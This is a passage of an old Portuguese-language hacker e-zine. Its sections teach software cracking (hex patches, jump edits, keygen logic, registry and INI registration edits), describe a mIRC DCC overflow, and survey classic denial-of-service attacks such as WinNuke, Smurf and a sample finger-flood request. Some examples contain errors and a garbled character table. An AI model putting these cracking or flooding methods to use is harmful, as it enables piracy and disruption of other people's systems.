  R    - Edita os registradores
  D    - Ver os dados
  E    - Editar os dados
  U    - Ver o codigo
  A    - Editar o codigo
  H/F1 - Help :)

  Essa parte do SoftIce eu tirei do Tutorial do Ed!son.
  Pra naum fikarem dizendo "Esse zine eh todo copiado... mo traducao!!!".

  2.3 - O compilador

  Vc ira precisar saber alguma linguagem de programacao para fazer o cracker.
  As mais usadas sao ASM, C e Pascal, eu particularmente uso Pascal, mas nao
  ha nenhuma diferenca no resultado final do cracker.
  E tambem eh obvio, precisara ter o compiador para essa linguagem.

  2.4 - O descompilador

  Nao eh para todas as linguagens de programacao que existe um descompilador,
  mas se o programa ah crackear for descompilavel, jah eh uma gde ajuda.

  Eu jah vi para Pascal e VB, mas eh so procurar q devem haver outros.

  E se vc for crackear um programa grande, a descompilacao pode ser
  complicada, e compilar ele de novo pode dar mais tabalho ainda ;).

  2.5 - Calculadora, papel e caneta

  Po kra, calculadora, papel e caneta, pra q eu vou usar isso?
  Essas tres ferramentas sao essenciais na hora de fazer um Key Gen, o que
  eu irei explicar mais abaixo pra que serve.

3 - O programa

  3.2 - A plataforma

  Saber a plataforma em que o programa roda, eh essencial.

  Isso para saber qual debugger vc ira utilizar, e tb qual(is) metodo(s) voce
  ira utilizar para crackea-lo.  

  Crackear programas feitos para Windows, eh geralmente + facil do que os para
  DOS, pois fica + dificil de esconder as funcoes, jah que elas geralmente sao
  executadas a partir de janelas, botoes, labels, etc...

  3.2 - A linguagem   

  Eh muito util, antes de vc comecar ah crackear o programa, saber em qual
  linguagem ele foi feito, porque cada uma, como eu jah disse a cima tem as
  suas particularidades.

  3.3 - Encriptacao

  Eh ai que o negocio complica, crackear um programa encriptado eh bastante
  dificil, entao se vc perceber q ele eh encriptado c/algum programa como o
  PKlite, procure achar algum cracker/desencriptador, para o tipo de
  encriptacao em q ele se encontra.

4 - O crack

  4.1 - O tipo do crack

  Uma coisa boa de jah se saber quando for crackear, eh o tipo de crack que
  sera utilizado.
  Isso influenciara em todo o processo de cracking e da montagem do cracker.

  4.2 - Crack Simples

  O crack simples, eh o mais comum de todos, e o mais usado ele consiste em
  apenas mudar partes do executavel.

  Exemplo:

  - Original

  000D2780 7273 0000 2573 5C25 6400 0000 4361 6E74 rs..%s\%d...Cant

  - Alterado

  000D2780 7273 0000 2573 5C25 6400 0000 4361 6E74 rs..%d\%s...Cant

  Esse crack altera a posicao de duas variaveis dirtetamente no .EXE.


  4.3 - O crack em ASM

  Voce tambem podera crackear um arquivo usando a linguagem ASM, esse tipo
  de crack tambem e muito usado, por facilitar o entendimento de como
  funciona o evento a ser crackeado.

  Exemplo:

  - Original

  JMP	NEAR PTR L008AH

  - Alterado

  JNE   NEAR PTR L008AH

  Alterando de JMP para JNE, o programa ira para determinada funcao, mesmo que
  a condicao nao seja verdadeira, ou seja JNE ( Jump if not equal ).

  Depois de feito esse crack, o .ASM podera ser compilado, e comparando o
  .EXE original com o alterado, o crack podera ser feito atraves do simples
  tambem.


  4.4 - Engenharia Reversa

  A engenharia reversa e usada para gerar a key do programa, ela consiste em
  fazer o processo reverso de validacao da key.

  Ex:

  Key1   Key2
  0000 - 0000

  Validacao da key:

  if key1 / 2 = key2 / 3 then keyok

  Nesse caso, a key seria validada se a primeira parte dela, dividida por 2
  fosse igual a segunda dividida por 3.

  Ou seja:

  Se a key usada fosse 4444 - 6666, ela seria validada pois.

  4444 / 2 = 2222
  6666 / 3 = 2222

  2222 = 2222 entao keyok.

  Para usar a engenharia reversa, teria que se fazer exatamente o inverso da
  validacao:

  2222 * 2 = 4444
  2222 * 3 = 6666

  Tai a key! 4446 - 6666...

  Entao a partir dessakey e do algoritmo de engenharia reversa, podera ser
  programado o Key Gen.

  4.5 - O crack no registro

  Partindo da logica de que um programa tem que guardar os seus dados, que
  identificam se ele e registrado ou nao, em algum lugar, muitos deles
  gravam essas infos no registro do windows, podendo assim, se vc jah tiver
  algum serial valido, fazer o crack diretamente no registro.

  Outro modo mais dificil de ser encontrado e uma key no registro que
  identifica apenas se o programa e registrado ou nao, podendo assim ser
  alterada mesmo sem o serial.

  Exemplo 1:

  REGEDIT4

  [HKEY_LOCAL_MACHINE\SOFTWARE\SUXSOFT]
  "RegName"="Sux"
  "RegCode"="44446666"

  Esse e um exemplo de um programa que guarda se ele e registrado no registro,
  entao provavelmente, a primeira coisa que ele faz ao ser executado e ler
  essas duas chaves para checar se o registro ja foi feito.

  Para fazer o crack basta colocar essas infos num arquivo .REG e executar.
  E entao o .REG ira atribuir valores as keys, apagando os antigos.
  No exemplo, aconteceria isso:

  O valor da chave RegName sera alterado para Sux
  O valor da chave RegCode sera alterado para 444666
  
  Sendo que essas chaves estariam contidas em:

  HKEY_LOCAL_MACHINE\SOFTWARE\SUXSOFT


  4.6 - Crack no .INI

  Outro lugar bastante comum em que os programas grardam suas infos de
  registro, sao nos arquivos .INI, que geralmente estao no dir do windows.

  O sistema de checking e bem parecido com o do registro, as unicas mudancas
  sao na organizacao das keys e tb que o crack devera ser feito diretamente no
  .INI



  - Exemplo 1:

  [Registration]
  Name=Sux
  Code=44446666

  O arquivo seria c:\windows\sux.ini

  E mudando os valores originais para esses, o programa estaria registrado.

  - Exemplo 2

  [Registration]
  IsRegistered=Yes

  Esse tb eh o mesmo esquema do crack no registro.

  4.7 - No CD

  Leia-se NOU CEDE e nao NO CEDE, okz?
  Ou seja sem precisar de cd.
  Esse crack pode ser feito de qualquer forma das citadas acima, dependendo
  do programa que vc ira crackear.

  Normalmente, esse tipo de crack e feito mudando-se o path do CD para o path
  do HD.

  Exemplo:

  - Path original

  d:\sux\sux.exe

  - Path alterado

  c:\sux\sux.exe

  Como eu jah disse esse crack depende do tipo de check do programa.

5 - O Cracker

 Ele e o programa que executa o crack... D

 5.1 - Cracker Simples

  O cracker simples muda diretamente no executavel, os valores necessarios.

  Geralmente as informacoes que vc precisara para voce fazer um cracker simples
  sao:

  - Offset
  - Valor antigo (Original)
  - Novo valor
  - Tamanho do arquivo
  - Nome do arquivo

 5.2 - Key Gen
  
  Para programar um Key Gen, voce precisara das seguintes informacoes sobre o
  programa

  - Algoritmo de verificacao
  - Algoritmo Inverso da key

 5.3 - Algoritmo

  Irei demontrar aqui passo a passo, o que o cracker faz ate que o programa
  esteja devidamente crackeado.

              Verificar se o programa existe
                             |
      Verifica se o tamanho do executavel eh o correto
                             |
  Verifica se o valor do OffSet e igual ao valor antigo(Original)
                             |
           Se Valor antigo = valor original
                             |
            Abre o arquivo e muda o valor pro novo
                             |
            Senao apresenta mensagem de erro e sai
                             |
                   Fecha o arquivo e sai

6 - Treinando

  Voce tem tambem, modos de treinar suas novas e velhas tecnicas, os que eu
  mais uso sao:

  - Programas
  - Crack-me

 6.1 - Programas

  Pra arrumar uns programas crackeaveis (Com tempo limitado), voce pode ir
  nesses sites de shareware e tal.
  Um bom site eh o tucows.

 6.2 - Crack-me

  Os Crack-me sao programinhas feitos para serem crackeados, em sites
  crackers, vc encontra varios deles, geralmente, sao acompanhados de
  tutoriais, vale a pena tentar.

7 - Tabela Hexadecimal

Essa tabela ai eh bastante util quando se vai "Hexar" um programa.

Dec	Hex	Char	Code

0	00		NUL
1	01		SOH
2	02		STX
3	03		ETX
4	04		PF
5	05		HT
6	06		LC
7	07		DEL
8	08		
9	09		RLF
10	0A		SMM
11	0B		VT
12	0C		FF
13	0D		CR
14	0E		S0
15	0F		S1
16	10		DLE
17	11		DC1
18	12		DC2
19	13		DC3
20	14		RES
21	15		NL
22	16		BS
23	17		IL
24	18		CAN
25	19		EM
26	1A		CC
27	1B		
28	1C		IFS

29	1D		IGS
30	1E		IRS
31	1F		IUS
32	20		DS
33	21		SOS
34	22		FS
35	23		
36	24		BYP
37	25		LF
38	26		ETB
39	27		ESC
40	28		
41	29		
42	2A		SM
43	2B		
44	2C		
45	2D		ENQ
46	2E		ACK
47	2F		BEL
48	30		
49	31		
50	32		SYN
51	33		
52	34		PN
53	35		RS
54	36		UC
55	37		EOT
56	38		
57	39		
58	3A		
59	3B		
60	3C		DC4
61	3D		NAK
62	3E		

63	3F		SUB
64	40		SP
65	41	
66	42	
67	43	
68	44	
69	45	
70	46	
71	47	
72	48	
73	49	
74	4A	
75	4B	.
76	4C	<
77	4D	(
78	4E	+
79	4F	|
80	50	&
81	51	
82	52	
83	53	
84	54	
85	55	
86	56	
87	57	
88	58	
89	59	
90	5A	!
91	5B	$
92	5C	*
93	5D	)
94	5E	;
95	5F	
96	60	-
97	61	
98	62	
99	63	
100	64	
101	65	
102	66	
103	67	
104	68	
105	69	
106	6A	|
107	6B	

108	6C	%
109	6D	_
110	6E	>
111	6F	?
112	70	
113	72	
114	72	
115	73	
116	74	
117	75	
118	76	
119	77	
120	78	
121	79	\
122	7A	:
123	7B	#
124	7C	@
125	7D	
126	7E	=
127	7F	
128	80	
129	81	a
130*	82	b
131*	83	c
132*	84	d
133*	85	e
134*	86	f
135*	87	g
136*	88	h
137*	89	i
138*	8A	
139*	8B	
140*	8C	
141	8D	
142	8E	
143	8F	
144	90	
145	91	j
146	92	k
147*	93	l
148*	94	m

149*	95	n
150*	96	o
151*	97	p
152*	98	q
153*	99	r
154*	9A	
155*	9B	
156*	9C	
157	9D	
158	9E	
159*	9F	
160	A0	
161	A1	~
162	A2	s
163	A3	t
164	A4	u
165	A5	v
166	A6	w
167	A7	x
168	A8	y
169	A9	z
170	AA	
171	AB	
172	AC	
173	AD	
174	AE	
175	AF	
176	B0	
177	B1	
178	B2	
179	B3	
180	B4	
181	B5	
182	B6	
183	B7	
184	B8	
185	B9	
186	BA	
187	BB	
188	BC	
189	BD	
190	BE	

191	BF	
192	C0	{
193	C1	A
194	C2	B
195	C3	C
196	C4	D
197	C5	E
198	C6	F
199	C7	G
200	C8	H
201	C9	I
202	CA	
203	CB	
204	CC	
205	CD	
206	CE	
207	CF	
208	D0	}
209	D1	J
210	D2	K
211	D3	L
212	D4	M
213	D5	N
214	D6	O
215	D7	P
216	D8	Q
217	D9	R
218	DA	
219	DB	
220	DC	
221	DD	
222	DE	
223	DF	
224	E0	\
225	E1	
226	E2	S
227	E3	T
228	E4	U
229	E5	V
230	E6	W
231	E7	X

232	E8	Y
233	E9	Z
234	EA	
235	EB	
236	EC	
237	ED	
238	EE	
239	EF	
240	F0	0
241	F1	1
242	F2	2
243	F3	3
244	F4	4
245	F5	5
246	F6	6
247	F7	7
248	F8	8
249	F9	9
250	FA	
251	FB	
252	FC	
253	FD	
254	FE	
255	FF

E entaum deu pra entender?
Ih kra... se vc deu, vc eh meio gay :)

T+

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

                  
 04 - Telefonia
                  
    x0trm
                     -


Alo, eu como escritor de phreaking-eletronica, to escrevendo mais uma mate-
ria pra botar mais conhecimento no seu arsenal de truques e manhas com telefo-
nes... hehehehe... Bem, na verdade to escrevendo esse negocio mais "pratico"
como os lamers gostam de dizer... Nao vou pegar muito na teoria, mas apenas
esbanjar um pouco de conhecimento "pratico"?! Tmb eu escrevi esta materia 
pensando em uns lamers putos da vida, que nao sabem nem o q eh um transistor
de efeito de campo, nem sabem como a induao eletromagnetica pode nos "ajudar"
na hora da escuta... E chegavam a me perguntavam: xt0rm, cara eu sou meio
bom ateh em phreak e queria entrar no grupo kra...
   Tudo bem, entao do dia do teste, eu chegava e perguntava: para que servem
aqueles botoes "*" asterisco e "#" jogo da velha no teclado do telefone?
   Ae eles diziam, ah, cara, eh que existem uns coisos assim sabe (tentando  
fugir do assunto) huauhauhauhauha, ateh minha vo sabe isso!
   Entao, como eu ia dizendo, lamerzaiada do phreak nacional, aih estah uma
materia pra vc humilhar seu vizinho em conhecimento!!! putz imagina vc chegar
no colegio e ficar demonstrando e impressionando as gatinhas pq vc sabe como
se liga de graa!!!! huauhauhauha, putz eu me estrago de rir pensando nesse 
tipo de gente...
   Ok, depois dessa pequena satira sobre "ditos" lamers da vida, vamos ao que
interessa ao bom leitor do zine. Como eu disse, vao truques que podem ateh
ajudar um dia na construao de uma box. Sao truques que descobri pela minha
experiencia pessoal com o passar do tempo, tmb vou aproveitar pra essa materia
na ficar pequenininha, vou falar sobre uma nova box q estou desenvolvendo, pra
ver se eu consigo ajuda tmb de outras pessoas. Nao vou apresentar o circuito
dela, pois ainda estou desenvolvendo, apenas vou descrever minha ideia do seu
funcionamento e sua utilidade, e quem quiser me ajudar na elaboraao do proje-
to, meu querido e-mail (mailto:xt0rm@usa.net) estah de "portas" aber-
tas pra quem quiser me ajudar. Ou pode me procurar no IRC nos fins de semana
q eu fico lah perdendo tempo BOzando os lammahz, hehehe.


=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=


                  
 05 - Mirc 5.4 Bug
                  
    BigBen
                     -


   Hello cornholios! Tou aki    soh pra aprensentar proc's o *new* bug do 
mIRC 5.4. Ultimamente o   Khaled   tah    vacilando demais no seu code e tal
... Tah deixando muitos   overflows.   Soh vou EXPLICAR mais um deles
(existem varios q eu peguei, mas eles soh funcionam em uma certa 
configuracao e tal...)
					

 !!- WHAT SHALL WE SAY? -!!
 --- ================== ---
  Bem, esse  bug consta     em    um    overflow  q o mirc tem, eh o 
seguinte:
Quando vc   manda   um   arquivo  pelo mirc(ele usa o sistema de CTCP DCC,
veja mais abaixo), ele  abre   um   socket,  random port(1xxx). Sim, na
teoria, ele deveria abrir  uma  porta para cada arquivo, mas o mIRC 5.4,
abre 1 socket pra todos os arquivos... Okay, deve ter sido erro de 
programacao. 

  Analisando   o   segundo  fato, quando voce pede o RESUME(continuacao do
DCC SEND de um   arquivo,  que foi parado pela metade e tal..), o mirc usa 
o mesmo socket do receive!  Calma...   toh chegando lah.. Ao abrir o mesmo
socket, ele reinicia.. Mas a  mesma    janelinha  do GET   eh a  mesma 
janelinha do RESUME. Causando   overflow  no   code,   e travando o mirc 
pelo  SHELL32.dll, naum me lembro qual a funcao... mas eu acho q seja 
Update_GUI, ou coisa assim.

 !!- DCC PROTOCOL -!!
 --- ============ ---
  Vou falar soh dos basicos, naum kero entrar em detalhes grandes e tal...

*DCC SEND:
Sintaxe: privmsg nick :char(01)DCC SEND arqname.ext porta tamanhochar(01)
OBS- char(01), tente $chr(01)...
Isso fara aparecer a janela de get, no usuario.

*DCC RESUME:
Sintaxe: privmsg nick :char(01)DCC RESUME arq.ext tamanhochar(01)
Isso fara o arquivo ser resumido em tal ponto.

 !!- EXPLOIT IT -!!
 --- ========== ---
  Naum   vou   falar   o codigo do exploit.. Eu EXPLIQUEI como eh que 
funciona, expliquei   o code, faca o seu propio exploit! Ou entao 
pesquise.. Bem muito..
Naum vou entregar uma coisa de mao beijada... whata sux!
Estou fazendo isso pra vc desenvolver o SEU raciocinio! Xploit!


=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=


                  
 06 - Denial Of Service
                  
    SyCoFlUiD
                     -


Nota: Presumo que voce tenha um conhecimento razoavel sobre TCP/IP


-=-=- I. 0 QU3 3H D0S?!? -=-=-


Pra comecar a escrever sobre DoS, nada melhor do que explicar o que eh isso.
O LaMMaH vem e diz: "Eu sei! Eh um sistema operacionau super legau criadu
pelu Biu Gaytis, pai du mercadu di sofitiware! I eu sei tudu deli!!". Nao! O
Hacking nao se limita a merdas como DOS lammah! Na verdade nem sei se chega a
incluir tamanha bosta (hehehe). Assim, DOS e DoS sao coisas diferentes:
enquanto DOS quer dizer "Disk Operating System", DoS eh sigla para "Denial of
Service". DoS eh um tipo de ataque muito util que, como o proprio nome diz,
nega determinado servico aos usuarios, ou seja, impede que estes usuarios
acessem determinado servico do host.

Pode-se ter como alvo de um ataque DoS desde o mais baixo layer do TCP/IP
stack ate o layer de aplicacao..travando o IRC do cara por exemplo. Como
veremos aqui, nao existe UM ataque DoS mas sim varios tipos de ataques que
podem ser classificados como DoS, cada um deles atacando uma parte do
protocolo TCP/IP e de seus subprotocolos.

A utilidade? HeHeHe...vrias! O prprio mailbomb pode ser classificado como
um ataque DoS pro exemplo, pois ele enche a caixa do man de mensagens
impedindo que o cara cheque e talvez at travando o servidor POP3 (o que ja
aconteceu)! Outro exemplo eh o winnuke (a ser discutido mais adiante) que
ataca um driver do TCP/IP e pode fazer coisas que variam de cair a conexao do
cara ate resetar o micro do sujeito! Assim, o DoS surge como um novo campo a
ser explorado, investigando nao especificamente FUROS DE SEGURANA mas sim
fraquezas na maneira em que os protocolos e os sistemas operacionais lidam
com determinados tipos e quantidades de dados. Se voce ainda nao tomou uma
nocao clara do que seria DoS, o funcionamento dos ataques abaixo ira te ajudar
a entender.


-=-=- II. 0S 4T4QU35 -=-=-


1 - WINNUKE

--> OS's afetados: Windows 95 (incluindo OSR2) e Windows NT 4.0

Eh sobre esse ataque que eu tenho mais conhecimento entao vou poder falar um
pouco mais sobre ele. Quando titiu Bill Gate$ criou o Windows 95 e Cia.,
pensou em como seria a implantacao do compartilhamento de arquivos, dada
atraves de um protocolo conhecido como NetBIOS (Network Basic Input/Output
System). Queria que fosse algo pratico, constante e sem dificuldades para o
usuario final. Para isso, reservou para o NetBIOS a porta TCP/IP 139 e deixou
ela aberta em TODOS os sistemas, como um default. Acontece que acabaram
descobrindo que era possvel fazer um ataque DoS bem interessante com essa
porta 139. Esse ataque consiste em mandar uma mensagem OOB (Out of Band) para
essa porta e como o Rwindows no sabe lidar com esse tipo de mensagem, occore
um erro no TCP/IP stack do seu Rwindows, fazendo aparecer portanto, a classica
tela azul com as mensagens de erro do driver. Embora seja mais comum winnukar
uma pessoa pela porta 139, isso pode ser feita por outroas portas relacionadas
a NetBIOS (como a 135 e 137), desde que estejam "escutando". Entre a grande
variedade de mensagens que podem surgir, essas sao as mais comuns:

Fatal exception 0E at 0028: in VxD MSTCP(01) + 000041AE. 
This was called from 0028: in VxD NDIS(01) + 00000D7C. 

Fazendo assim, com que a conexao do usuario caia ou ate que o micro dele
reinicie! O problema eh que agora, com esse ataque ja bem popularizado, alguns
lammahs insistem em se intitularem hackers so por que tem capacidade mental
(de retardado) de digitar um IP e clicar em um botao START, "azulando" a tela
da infeliz vitima. Ta vendo soh no que dah colocar coisa seria na mao de
crianca...

2 - LAND

--> OS's afetados: Windows 95 (incluindo OSR2), Windows NT 4.0, BSDI 2.1
(vanilla), FreeBSD 2.2.2-RELEASE, FreeBSD 2.2.5-RELEASE, FreeBSD 2.2.5-STABLE,
FreeBSD 3.0-CURRENT, HP-UX 10.20, MacOS 8.0, NetBSD 1.2, NeXTSTEP 3.0, NeXTSTEp
3.1, OpenBSD 2.1, Solaris 2.5.1 e SunOS 4.1.4.

Entre outros, o Linux nao eh afetado a partir do kernel 2.0.30 (hail Linus!!).
Entao deixa de frescura e larga logo teu Rwinslow! UEHUEHEUEHUE

Esse ataque usa um mecanismo interessante, apesar de nao causar danos
consideraveis, so provocando uma lentidao por algum tempo. Eh o seguinte: voce
manda varios pacotes TCP/IP com a flag SYN, spoofados com o IP do proprio alvo.
A flag SYN eh a flag do TCP/IP responsavel por iniciar o processo de uma
conexao TCP/IP, conhecido como Three-way Handshaking (aperto de mao em tres
vezes numa traducao forcada). Assim, ao receber uma flag syn, o TCP/IP
responde o IP cliente imediatamente com um pacote com as flags SYN e ACK.
O que o LAND faz eh simples: como as SYN requests estao spoofadas com o IP
do proprio alvo, esse alvo acaba mandando as SYN ACK's para ele mesmo,
causando uma lentidao enorme no sistema e chegando ate mesmo a trava-lo em
algumas variacoes. Simples e eficiente.

Uma variacao encontrada do LAND eh o LATIERRA, que torna mais eficiente o
ataque contra servidores NT com SP3 (Service Pack 3).

3-TEARDROP

--> OS's afetados: Windows 95 (incluindo OSR2), Windows NT 4.0 e Linux
(corrigido a partir do kernel 2.0.32)

Esse ataque tambem eh muito famoso. Ele explora um bug presente no layer IP
(relacionado a fragmentacao de datagramas IP) do TCP/IP stack dos diferentes
OS's listados acima. Quando a vitima recebe determinados dados, seu sistema
pode congelar repentinamente, sua conexao cai e no caso de sistemas Windows
pode ate ser que apareca a famosa e temida tela azul, acusando um erro.
Entretanto, esse bug nao causa graves danos e um simples reboot ira
normalizar tudo.

Voce encontrara maiores detalhes sobre esse ataque na boa e velha ROOTSHELL
(http://www.rootshell.com)! Eh soh dar um Search.

4-SSPING/JOLT

--> OS's afetados: Windows 95 (incluindo OSR2), Windows NT 4.0 e antigas versoes do MacOS

HEHEHE. Esse exploits desenterra o velho problema dos sistemas windows com o
protocolo ICMP, e mais especificamente, com a funcao PING. O que o SSPING faz
eh que ele cria pacotes de dados ICMP muito grandes (mais do que o permitido),
os fragmenta em muitas partes (para que seja possivel enviar) e os envia todos
de uma vez soh para o alvo. Quando o alvo pega esses fragmentos e tenta remontar
os pacotes originais, o computador trava e deve ser rebootado.

HEHEHEHE ta vendo! Mais um motivo pra mudar de OS! Linux na cabeca!! 

5-BONK/BOINK

-->OS's afetados: Windows 95 (incluindo OSR2) e Windows NT 4.0

Esses dois ataques sao na verdade variacoes do conhecido TEARDROP. O Bonk
seria um teardrop que trava mesmo maquinas patcheadas. Ja o Boink eh uma
versao mais avancada do Bonk e permite que portas UDP sejam tidas como alvo.
Esses ataques de baseam no fato de que o Windows pode travar se receber
muitos pacotes UDP corrompidos. Assim, o programa manda varios datagramas IP
fragmentados e no computador alvo, sao remontados em pacotes UDP invalidos
atraves do "overlapping bug", tambem muito explorado no TEARDROP.

6-SMURF

--> OS's afetados: todos. Isso mesmo, voce ouviu bem! T-O-D-O-S!!!

Cara, eu jah tava ficando com sono escrevendo sobre ataques tao ineficientes
e duvidosos mas agora chegou a hora de falar sobre um dos mais lokos e
devastadores! SMURF! A simplicidade desse ataque chega a espantar quando se
observa os danos que podem ser causados! Entre todos os DoS descritos aki,
esse eh o primeiro que nao envolve apenas dois computadores: o invasor e a
vitima, mas sim centenas e talvez ateh milhares de hosts, CONTRA APENAS UM SOH!
Devastador! O que o smurf faz eh que ele manda um broadcast de pacotes ICMP
(manda para varios enderecos, contidos em uma lista a ser criada por voce) soh
que com  o endereco de origem spoofado com o IP da vitima. Assim, todos os
computadores que foram pingados irao responder unicamente para esse computador
vitima!

Por exemplo, se voce manda um ping para 1000 computadores e esse ping tem como
IP de origem o IP da vitima, esse pobre coitado ira receber nada mais nada
menos que 1000 pacotes ICMP de resposta! Quase ao mesmo tempo! Isso
simplismente detona com o micro do cara e trava ele totalmente, tendo que ser
reiniciado.

7-FINGER DoS

-->OS's afetados: Os que tao rodando finger unpatcheado 

Esse eh um DoS bem merrequinha mas ele existe entao prefiro esclarecer tudo
logo e explicar seu funcionamento. Pra quem nao sabe, finger eh um servico
muito presente em sistemas multiusuario (especialmente sistemas UNIX) que
mostra quem esta logado no sistema, seus logins, terminais que estao
utilizando, tempo que estao logados etc. Eh bem util na obtencao de
informacoes para uma hackeada mas nao eh disso que estamos falando agora :))!
O finger opera na porta 79 e funciona no esquema REQUEST-ANSWER. Assim, voce
faz um finger request para o fingerd (finger daemon) de um host e esse host
te responde, de acordo com a request que foi feita.

Se voce quiser saber quem estah logado no sistema voce da o comando finger
@sistema.com.br e logo vera uma lista de usuarios logados.

Se voce quiser saber informacoes sobre um determinado usuario, voce da o
comando finger usuario@sistema.com.br

O ataque consiste em varios finger requests enviados rapidamente para o alvo:
usuario@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@sistema.com.br

Cada @ que voce colocou representa um request e logo assim, o computador
vitima sofrera um flood de requests, o que diminuira seu desempenho (nunca
soube de nenhum travamento ocasionado por esse ataque).


=-=-= III. 3 E3NT40? =-=-=


E entao o seguinte manow! Se voce tem neuronios o suficiente em seu cerebro
voce deve ter percebido que o SUPER-HIPER-TRIPER Rwinslow 95 e NT sao vitimas
de quase todos os ataques listados aki. E nao pense que esses sao todos pois
existem mais e muitos outros estao sendo criados nesse momento! DoS eh agora,
como eu ja mencionei antes, um novo campo de investigacao para os hackers e
mais um motivo pra voce jogar fora esse teu Windows de merda e arranjar um
sistema operacional decente, como Linux.

Sim, O Linux tambem eh e ja foi muito vulneravel a ataques mas se pegarmos
como exemplo o TEARDROP, assim que foi publicada a existencia do bug, logo foi
criado um patch para Linux, e sabe em quanto tempo? 2 horas e 30 minutos! E
Enquanto os usuarios Linux ficavam felizes da vida e protegidos de ataques os
Rwin-Usuarios ficavam dias e dias sentados em suas poltronas esperando a
Micro$hit lancar um SUPER-VIP-ULTRAVIP PATCH, que nem iria funcionar! O que
estou querendo dizer eh que eh muito mais facil voce patchear um sistema
linux do que um sistema Windows 95, ja que os exploits sao escritos justamente
em C, para operarem em Linux. E alem disso, enquanto os nerds na Microsoft
ficam rachando o cranio pra consertar a complicacao que eles mesmos criaram,
o Linux conta com milhares de usuarios e programadores espalhados pelo mundo
inteiro sempre trabalhando em conjunto e em busca de novidades. Esse foi o
preco que titiu Biu teve que pagar por criar uma interface toda bonitinha
drag-and-drop para seus usuarios:
Uma interface TCP/IP toda chata e complicada, enquanto TCP/IP e Linux sao 
uma coisa soh.

Sempre pesquise sobre novos DoS e ataques do tipo jah que estes estao sendo
criados a todo o momento. Um endereco excelente para se manter atualizado
sobre o assunto eh a ROOTSHELL (www.rootshell.com) e tambem assine a lista de
seguranca BUGTRAQ, uma das mais famosas do mundo.

Fontes consultadas:

Spikeman's DoS Site (http://spikeman.dyn.ml.org/dos/) - Site excelente sobre o
funcionamento dos ataques
Rootshell (http://www.rootshell.com) - Preciso falar alguma coisa?

(c) =|SyC0FlUiD|=


=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=


                  
 07 - Dicas 4 Linux
                  
    BLAcK MaSK
                     -


        Bem, N0W LiNUX RuLeZ!!!  Como jah disse na edicao passada, espero que
os  leitores  contribuam  nesta secao,  enviando dicas, comentarios, duvidas,
sugestoes,  criticas "construtivas", etc.  Nao  precisa ter medo de perguntar
ou achar que a sua pergunta eh muito  idiota (se voce tem duvida se ela eh ou
nao, eh porque ela realmente eh! :-p), mas isto nao  vem ao caso, prometo dar
um reply a todos os mails, solucionando a duvida ou encaminhando voce a solu-
cao. Contudo, conforme disse  um  amigo meu, a maioria quer tudo na "boca", a
estes digo que nao adianta reclamar pois nao vou explicar tudo passo a passo,
apenas  o que for realmente necessario para que nao deixe duvidas e funcione.
Outra coisa: NAO vou  colocar  aqui listas de comandos ou tutoriais de linux,
primeiro  porque  este nao eh o meu  objetivo,  segundo  porque jah tem muito
material   por  aih...  As  materias  que escreverei serao sempre sobre algum
assunto relacionado a seguranca, do seu linux eh claro, ou hacking, portanto,
NAO  esperem ver titulos como : "Instalando o ICQ Java" ou "Recompilado o seu
kernel". Para quem fez o download do linux ontem na NET (arghh!) ou comprou o
CDzinho por alguns $$ e ainda nao sabe por onde comecar, aih vao algumas URLs
e listas de discussao de assinatura mais que obrigatoria:


				-=-=- URLS -=-=-

http://www.netdados.com.br/tlm => Home Page do "The Linux Manual"
				  Um dos melhores que jah vi, e em portugues!

http://linux.unicamp.br => Pagina com varios HOWTOS traduzidos e  mais  links
			   interessantes.

http://sunsite.unc.edu => Falow em programas pra Linux, falow em SunSITE!

http://edge.linuxhq.com => Cutting Edge Linux -  Para  achar  sempre a ultima
			   versao do kernel.

http://www.kernel.org => Idem

http://www.polaris.net/ugu => Unix Guru Universe - Afinal, a vida nao  eh soh
			      Linux! ;-P

http://www.linux.org => Home Page Oficial do Linux

http://www.redhat.com => Home Page da distribuicao "Red Hat Linux"  (o que eu
			 uso.. hehehe)

http://www.linuxmall.com => Se quiser comprar 6 CDs com linux por menos de $20

http://www.crhl.com.br => Aqui voce acharah um linux "tropical"...



Aih chega, isto aqui nao eh bookmark! :-))



			-=-=- LISTAS DE DISCUSSAO -=-=-

Linux-BR : mandar mail para linux-br-request@unicamp.br, sem assunto e no cor-
po da mensagem : "subscribe seumail@seuprovedor.com.br" (sem aspas neh?!)

Lie-BR : mandar mail vazio para lie-br-request@listas.conectiva.com.br

Lual : mande mail para owner-lual@cps.softex.br. Este mail deverah conter nome
Completo e e-mail



			-=-=- Otherz Resourcez -=-=-

/usr/bin/man => Man Pages...  Uma das melhores formas de aprender se o Ingles
		    nao for a barreira e jah tah tudo aih na tua maquina!
                ex.: $ man kill

/usr/doc/HOWTO => Voce  jah  deu  uma  olhada neste diretorio da tua maquina?
                  Nao???  E depois  ainda  quer  ter  moral  pra dizer que se
		      esforca para aprender...

Brasnet #linux => Se voce jah procurou  por TUDO e ainda nao achou a resposta
                  vale  a pena  dar uma  passadinha lah...  Soh uma coisa: os
		      caras nao gostam que voce entre como ROOT no IRC...


		-><- Resposta dos "fracos e oprimidos" do RH -><-

        Nos  ultimos  meses,  criou-se  uma  grande  discussao a respeito das
distribuicoes  do Linux  e   muitos  perguntam qual a melhor e por que, mas a
maioria xinga o RH (Red Hat)... Nao sei a causa de tanta raiva!  Mesmo porque
a distribuicao RH foi uma das primeiras (a primeira vez que instalei  foi hah
mais de dois anos), e nunca tive problemas! Eh tambem  um dos mais  faceis de
instalar e o formato  RPM ajuda bastante... Agora,  se voce  diz isso  porque
nao consegue compilar programas, acho melhor voce dar um upload da glibc enao
ficar dizendo  que o RH eh lamah!!! Por falar em glibc,o Debian ainda vem sem
este pacote na instalacao e ninguem reclama... Serah que eh tao dificil fazer
o download dele na NET? Ou isso eh soh pra fazer "panca" no IRC? Concluindo :
qual o melhor ou qual linux voce usa nao eh o mais importante,  eh tudo Linux
e isso eh o principal! Contanto que nao seja o Monkey Linux, DO$Linux e tal..


NoW, let's start!


